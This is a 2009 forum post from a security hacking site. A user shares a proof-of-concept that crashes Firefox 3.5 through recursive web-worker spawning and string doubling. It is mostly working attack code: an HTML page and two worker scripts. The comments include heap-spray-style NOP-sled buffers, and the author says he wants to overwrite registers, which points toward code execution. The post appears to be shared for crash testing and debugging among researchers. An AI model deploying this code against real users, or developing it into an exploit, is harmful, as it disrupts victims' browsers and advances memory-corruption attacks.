Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Does this code crash your Firefox?
Posted by: malloci
Date: September 24, 2009 03:54PM

Couldn't help it... just had to add a third thread with the same name. Hey, at least I didn't copy my code line for line from the other posts (just my own post).

Either way, I am fairly sure this code will crash your Firefox3.5 browser.

This is just one version of the PoC I have been coding. It is ugly code but should serve as an example to use for debugginf FF3.5. Hope to get some feedback (crashes, debug, comments, ideas).

-------------------------------------
index.html
-------------------------------------
<!DOCTYPE HTML>
<html>
<head>
<title>DOS</title>
</head>
<body>
<p><h1>Please Wait, while I CRASH your Browser; it should not take long :)...</h1>:</p><div id="result"></div>

<script type="text/javascript">
var worker = new Worker("workCRASH.js");

// Watch for messages from the worker
worker.onmessage = function(event)
{
// The message from the client:
//event.data
// alert(document.domain + " - " + event.data);
// window.location = 'index.html';
// window.location = 'index.html';
// window.open ('index.html');
document.getElementById("result").textContent = event.data;
};
//var buf = unescape("%u9090%u9090"+"%u9090%u9090"+"%u9090%u9090"+"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
//var buf = unescape("%u0c0c%u0c0c");
var buf = unescape("\xcc\xcc\xcc\xcc");
var str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
buf = buf+str;
worker.postMessage(buf);

</script>
</body>
</html>

-----------------------------------------------------------
workCRASH.js
--------------------------------------------

onmessage = function(event){


var worker = new Worker("workCRASH.js");
worker.onmessage = function(event)
{
var worker = new Worker("workCRASH-Test.js");
worker.onmessage = function(event)
{
worker.postMessage(event.data.concat(event.data));
CollectGarbage();
postMessage(event.data.concat(event.data));
CollectGarbage();
};
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));
};

worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));

}

-------------------------------------
workCRASH-Test.js
------------------------------------

onmessage = function(event){

var worker = new Worker("workCRASH-Test.js");
worker.onmessage = function(event)
{
//var nop = unescape("\x90\x90\x90\x90");

var str1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
var str2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

worker.postMessage(event.data.concat(str1+str2));
postMessage(event.data.concat(str1+str2));
};

worker.postMessage(event.data.concat(event.data));
postMessage(event.data);

}

____________________________________

The code is a mess right now... I have been fuzzing it with diffrent input. Give it a go and let me know if it crashes your FF3.5 browser. If you have any time to debug the crash please post some output.

You might have to run the code a few times to get it to crash on a diffrent place then the xul!XPCNativeSet::Mark: error. Like I said I have not had to much time to work on the code, it is mostly a jumbled mess right now. I still am trying to find out how I can overwrite the registers.

malloc(i)

Options: ReplyQuote


Sorry, only registered users may post in this forum.